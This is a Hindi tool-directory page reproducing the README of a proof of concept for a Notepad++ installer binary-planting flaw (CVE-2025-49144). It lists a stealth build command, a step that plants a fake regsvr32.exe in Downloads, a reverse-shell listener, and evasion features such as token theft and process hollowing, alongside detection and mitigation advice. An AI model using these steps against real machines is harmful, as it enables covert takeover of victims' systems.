Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49144 — PoC CVE-2025-49144 | Kitploit
उपकरण/GitHubGitHub/vr00mm/cve-2025-49144
विशेषाधिकार वृद्धिस्थायित्व तंत्रशोषणकमांड एंड कंट्रोलसामाजिक इंजीनियरिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitHubvr00mm/cve-2025-49144

CVE-2025-49144

PoC CVE-2025-49144

621 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

Notepad++ बाइनरी प्लांटिंग PoC (CVE-2025-49144)

⚠️ केवल शैक्षणिक उद्देश्य के लिए
यह कोड बाइनरी प्लांटिंग भेद्यताओं को समझने के लिए शैक्षणिक और शोध उद्देश्यों हेतु डिज़ाइन किया गया है। केवल उचित प्राधिकरण के साथ नियंत्रित वातावरण में उपयोग करें।

📋 अवलोकन

यह प्रूफ ऑफ कॉन्सेप्ट GHSA-9vx8-v79m-6m24 में संदर्भित Notepad++ इंस्टॉलर (CVE-2025-49144) में बाइनरी प्लांटिंग भेद्यता को प्रदर्शित करता है। यह भेद्यता एक हमलावर को Notepad++ इंस्टॉलर के समान निर्देशिका में regsvr32.exe नामक दुर्भावनापूर्ण निष्पादन योग्य फ़ाइल रखकर SYSTEM-स्तरीय विशेषाधिकार प्राप्त करने की अनुमति देती है।

🎯 भेद्यता विवरण

  • लक्ष्य: Notepad++ इंस्टॉलर (v8.8.2 से पहले के सभी संस्करण)
  • विधि: दुर्भावनापूर्ण regsvr32.exe के माध्यम से बाइनरी प्लांटिंग
  • मूल कारण: Notepad++ इंस्टॉलर regsvr32 जैसे सिस्टम बाइनरी को निरपेक्ष पथ निर्दिष्ट किए बिना आमंत्रित करते हैं
  • प्रभाव: जब कोई उपयोगकर्ता इंस्टॉलर चलाता है, तो सिस्टम स्वचालित रूप से दुर्भावनापूर्ण फ़ाइल को SYSTEM विशेषाधिकारों के साथ लोड करता है, जिससे हमलावर को लक्षित मशीन पर पूर्ण नियंत्रण मिल जाता है
  • हमला वेक्टर: उपयोगकर्ताओं को वैध इंस्टॉलर और दुर्भावनापूर्ण निष्पादन योग्य दोनों को एक ही निर्देशिका (आमतौर पर Downloads फ़ोल्डर) में डाउनलोड करने के लिए सोशल इंजीनियरिंग या क्लिकजैकिंग

🏗️ आर्किटेक्चर

PoC में एक साथ काम करने वाले कई घटक शामिल हैं:

root@kitploit:~
┌─────────────────┐    ┌──────────────────┐    ┌─────────────────┐
│ Notepad++       │    │ Malicious        │    │  Reverse Shell  │
│ Installer       │───▶│ regsvr32.exe     │───▶│   (PowerShell)  │
│ (searches for   │    │ (CGO binary)     │    │  with SYSTEM    │
│  regsvr32.exe)  │    │                  │    │  privileges     │
└─────────────────┘    └──────────────────┘    └─────────────────┘

मुख्य घटक

🔧 तकनीकी विशेषताएँ

🛡️ एवेज़न तकनीकें

  • स्ट्रिंग अस्पष्टीकरण: स्थैतिक पहचान से बचने के लिए PowerShell पथ XOR-एन्कोडेड है
  • डिटैच्ड प्रोसेस: स्वतंत्र प्रोसेस बनाता है जो पैरेंट के समाप्त होने पर भी बने रहते हैं
  • टोकन प्रतिरूपण: SYSTEM टोकन चुराकर विशेषाधिकार बढ़ाता है
  • प्रोसेस हॉलोइंग: वैध Windows प्रोसेस में कोड इंजेक्ट करता है

🌐 नेटवर्क क्षमताएँ

  • TCP कीप-अलाइव: फ़ायरवॉल के माध्यम से स्थायी कनेक्शन बनाए रखता है
  • कनेक्शन रीट्राय: कॉन्फ़िगर करने योग्य देरी के साथ स्वचालित पुनः कनेक्शन
  • टाइमआउट हैंडलिंग: उचित टाइमआउट के साथ नॉन-ब्लॉकिंग सॉकेट संचालन
  • रेट लिमिटिंग: कनेक्शन स्पैम और पहचान को रोकता है

💻 सिस्टम एकीकरण

  • CGO एकीकरण: सिस्टम कॉल के लिए निर्बाध Go-to-C अंतर-संचालन
  • निष्पादन योग्य मास्करेडिंग: वैध regsvr32.exe व्यवहार की नकल करता है
  • मल्टी-थ्रेडिंग: stdin/stdout/stderr हैंडलिंग के लिए अलग-अलग थ्रेड
  • त्रुटि पुनर्प्राप्ति: कनेक्शन विफलताओं और प्रोसेस निकास का सुगम हैंडलिंग
  • संसाधन प्रबंधन: हैंडल, सॉकेट और मेमोरी की उचित सफाई

🚀 बिल्ड निर्देश

पूर्वापेक्षाएँ

root@kitploit:~
# Install Go (1.24+)
# Install MinGW-w64 for CGO compilation
# Install Git for version control

संकलन

root@kitploit:~
# Clone the repository
git clone https://github.com/Vr00mm/CVE-2025-49144
cd CVE-2025-49144

# Build as executable (masquerading as regsvr32.exe)

# For maximum stealth (strip debug info)
go build -ldflags="-s -w" -o regsvr32.exe

# For development (with debug symbols)
go build -o regsvr32_debug.exe

📖 उपयोग

बाइनरी प्लांटिंग (प्राथमिक हमला वेक्टर)

root@kitploit:~
# 1. Place malicious regsvr32.exe in same directory as Notepad++ installer
# Usually the Downloads folder where users download the installer
copy regsvr32.exe "C:\Users\%USERNAME%\Downloads\"

# 2. User downloads official Notepad++ installer to Downloads folder
# 3. When user runs the installer, it searches for regsvr32.exe in current directory first
# 4. Installer finds and executes our malicious regsvr32.exe with SYSTEM privileges

# 5. Listen for incoming reverse shell connection
ncat -tlnp 4445

🔍 हमला प्रवाह

root@kitploit:~
sequenceDiagram
    participant User
    participant Attacker
    participant Downloads
    participant NotepadInstaller
    participant MaliciousRegsvr32
    participant SystemProcess

    User->>Downloads: Download Notepad++ installer
    Attacker->>Downloads: Place malicious regsvr32.exe (social engineering)
    User->>NotepadInstaller: Run installer from Downloads folder
    NotepadInstaller->>Downloads: Search for regsvr32.exe in current directory
    Downloads->>MaliciousRegsvr32: Find malicious regsvr32.exe first
    NotepadInstaller->>MaliciousRegsvr32: Execute with SYSTEM privileges
    MaliciousRegsvr32->>MaliciousRegsvr32: Create detached process
    MaliciousRegsvr32->>SystemProcess: Enumerate SYSTEM processes
    SystemProcess->>MaliciousRegsvr32: Steal token from winlogon/services
    MaliciousRegsvr32->>MaliciousRegsvr32: Create PowerShell with SYSTEM token
    MaliciousRegsvr32->>Attacker: Establish reverse connection
    MaliciousRegsvr32->>NotepadInstaller: Continue with legitimate regsvr32 functionality
    Attacker->>SystemProcess: Execute commands as SYSTEM

🎓 शैक्षणिक पहलू

प्रदर्शित सुरक्षा अवधारणाएँ

  1. बाइनरी प्लांटिंग

    • असुरक्षित निष्पादन योग्य खोज पथ व्यवहार
    • इंस्टॉलर भेद्यताओं के माध्यम से विशेषाधिकार वृद्धि
    • सोशल इंजीनियरिंग हमला वेक्टर
  2. विशेषाधिकार वृद्धि

    • टोकन प्रतिरूपण विधियाँ
    • प्रोसेस टोकन चोरी
    • SYSTEM-स्तरीय एक्सेस अधिग्रहण
  3. स्थायित्व तंत्र

    • डिटैच्ड प्रोसेस निर्माण
    • सेवा प्रोसेस की नकल
    • कनेक्शन रीट्राय तर्क
  4. नेटवर्क प्रोग्रामिंग

    • रिवर्स शेल कार्यान्वयन
    • C में सॉकेट प्रोग्रामिंग
    • क्रॉस-प्लेटफ़ॉर्म नेटवर्किंग
  5. CGO प्रोग्रामिंग

    • Go-to-C अंतर-संचालन
    • Go में सिस्टम-स्तरीय प्रोग्रामिंग
    • क्रॉस-भाषा एकीकरण

सीखने के उद्देश्य

  • समझें कि बाइनरी प्लांटिंग भेद्यताएँ कैसे काम करती हैं
  • इंस्टॉलर में असुरक्षित निष्पादन योग्य खोज पथों के बारे में जानें
  • इंस्टॉलर दोषों के माध्यम से Windows विशेषाधिकार वृद्धि का अन्वेषण करें
  • सोशल इंजीनियरिंग हमला वेक्टरों का अध्ययन करें
  • CGO प्रोग्रामिंग और क्रॉस-भाषा एकीकरण का अभ्यास करें
  • सुरक्षित कोडिंग और भेद्यता विश्लेषण का अभ्यास करें

🛡️ पहचान और शमन

पहचान विधियाँ

root@kitploit:~
# Monitor for suspicious regsvr32 usage
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104}

# Check for unusual network connections
netstat -ano | findstr ":4445"

# Monitor process creation
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688}

शमन रणनीतियाँ

  • तत्काल कार्रवाई: Notepad++ v8.8.2 या बाद के संस्करण में अपग्रेड करें, जो regsvr32 जैसे निष्पादन योग्य फ़ाइलों को आमंत्रित करते समय स्पष्ट रूप से निरपेक्ष पथ निर्धारित करता है
  • एप्लिकेशन व्हाइटलिस्टिंग: AppLocker या Windows Defender Application Control जैसे टूल का उपयोग करें
  • निष्पादन योग्य सत्यापन: सभी निष्पादन योग्य फ़ाइलों के लिए डिजिटल हस्ताक्षर सत्यापन लागू करें
  • पथ सत्यापन: सुनिश्चित करें कि एप्लिकेशन सिस्टम उपयोगिताओं के लिए पूर्ण पथ का उपयोग करते हैं
  • न्यूनतम विशेषाधिकार: एप्लिकेशन को न्यूनतम आवश्यक अनुमतियों के साथ चलाएँ
  • नेटवर्क निगरानी: असामान्य आउटबाउंड कनेक्शनों की निगरानी करें
  • एंडपॉइंट डिटेक्शन: प्रोसेस हॉलोइंग का पता लगाने के लिए EDR समाधान तैनात करें
  • कॉन्फ़िगरेशन जाँच: Downloads फ़ोल्डर जैसे उपयोगकर्ता-लेखनीय स्थानों से इंस्टॉलर निष्पादित करने से बचें

⚖️ कानूनी और नैतिक विचार

⚠️ महत्वपूर्ण अस्वीकरण

  • प्राधिकरण आवश्यक: केवल उन वातावरणों में उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है
  • शैक्षणिक उद्देश्य: यह कोड सीखने और सुरक्षा अनुसंधान के लिए डिज़ाइन किया गया है
  • कोई दुर्भावनापूर्ण इरादा नहीं: अनधिकृत पहुँच या अवैध गतिविधियों के लिए अभिप्रेत नहीं है
  • जिम्मेदार प्रकटीकरण: उचित माध्यमों से मिली किसी भी भेद्यता की रिपोर्ट करें

नैतिक दिशानिर्देश

  1. जिम्मेदार उपयोग: केवल वैध सुरक्षा परीक्षण और शिक्षा के लिए उपयोग करें
  2. कोई अनधिकृत पहुँच नहीं: बिना अनुमति के सिस्टम के विरुद्ध कभी तैनात न करें
  3. उचित श्रेय: मूल शोधकर्ताओं और भेद्यता खोजकर्ताओं को श्रेय दें
  4. ज्ञान साझाकरण: सुरक्षा समुदाय के साथ निष्कर्षों को जिम्मेदारी से साझा करें

🔧 समस्या निवारण

सामान्य समस्याएँ

कनेक्शन विफलताएँ

root@kitploit:~
# Check if port is available
netstat -ano | findstr ":4445"

# Verify firewall settings
netsh advfirewall firewall show rule name=all | findstr "4445"

बिल्ड त्रुटियाँ

root@kitploit:~
# Ensure CGO is enabled
set CGO_ENABLED=1

# Check MinGW installation
gcc --version

# Verify Go installation supports CGO
go env CGO_ENABLED

टोकन अधिग्रहण विफलताएँ

  • सुनिश्चित करें कि प्रोग्राम पर्याप्त विशेषाधिकारों के साथ चलता है
  • जाँचें कि टोकन चोरी के लिए SYSTEM प्रोसेस उपलब्ध हैं या नहीं
  • Windows संस्करण संगतता सत्यापित करें
  • नोट: यह भेद्यता v8.8.2 से पहले के सभी Notepad++ संस्करणों को प्रभावित करती है, इसलिए PoC को व्यापक श्रेणी के इंस्टॉलेशन पर काम करना चाहिए

📚 संदर्भ

  • CVE-2025-49144 Repository
  • Notepad++ Security Advisory GHSA-9vx8-v79m-6m24
  • NVD CVE-2025-49144
  • MITRE ATT&CK T1574.007 - Path Interception by PATH Environment Variable
  • MITRE ATT&CK T1134 - Access Token Manipulation
  • Microsoft Documentation - Secure Binary Loading

📄 लाइसेंस

यह प्रोजेक्ट शैक्षणिक उद्देश्यों के लिए MIT लाइसेंस के अंतर्गत जारी किया गया है। विवरण के लिए LICENSE फ़ाइल देखें।


याद रखें: यह टूल केवल शैक्षणिक और अधिकृत परीक्षण उद्देश्यों के लिए है। हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और कानूनी सीमाओं का सम्मान करें।

टूल डाउनलोड करें
फ़ाइलउद्देश्यपंक्तियाँ
main.goप्रवेश बिंदु, regsvr32 निष्पादन संभालता है~80
winbind.hफ़ंक्शन घोषणाओं के साथ मुख्य हेडर~45
main.cकोर रिवर्स शेल लॉन्चर और डिटैच्ड प्रोसेस निर्माण~75
shell.cअस्पष्टीकृत PowerShell निष्पादन के साथ शेल हैंडलर~120
process.cटोकन अधिग्रहण और SYSTEM प्रोसेस निर्माण~195
socket.cTCP कीप-अलाइव के साथ नेटवर्क कनेक्शन~85
threads.cसॉकेट और पाइप के बीच I/O थ्रेडिंग~60
utils.cइनपुट सत्यापन और रेट लिमिटिंग~35
obfuscate.cPowerShell पथ अस्पष्टीकरण तकनीकें~70